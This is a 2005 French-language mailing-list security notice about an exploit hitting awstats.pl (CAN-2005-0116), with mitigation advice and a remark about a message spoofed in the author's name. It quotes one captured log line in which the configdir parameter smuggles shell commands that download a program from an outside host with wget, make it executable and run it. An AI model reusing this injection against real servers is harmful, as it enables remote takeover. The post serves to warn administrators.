[gull-annonces] awstats.pl exploit; truc envoye sous mon nom

Marc SCHAEFER schaefer at alphanet.ch
Thu Jan 27 15:51:03 CET 2005


Bonjour,

il y a apparemment un exploit qui tourne actuellement et tente
automatiquement de forcer l'utilisateur qui tourne éventuellement
awstats.pl (usuellement dans /usr/lib/cgi-bin/awstats.pl; d'ailleurs
l'exploit ne marche que s'il est là) de télécharger un programme et
de le lancer, ouvrant ensuite un port.a

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0116

La version de woody (Debian stable) n'est pas vulnérable (voir
http://www.debian.org/security/nonvulns-woody).

Exemple d'exploit:
200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

en bref la variable configdir est modifiée.

Probablement que le problème aurait pu être évité en utilisant la
variante à 3 paramètres de l'open de Perl. La variante à 2 paramètres a
aussi l'inconvénient de supprimer des espaces initiaux éventuels.

Arrêtez vos awstats ou mettez à jour, s'ils sont vulnérables, en
particulier s'ils se trouvent sous /cgi-bin/awstats.pl

PS: je n'ai pas envoyé le message de 2 lignes en HTML avec attachement
*vide*, si vous voulez vous en convaincre lisez les lignes Received: des
entêtes.




More information about the gull-annonces mailing list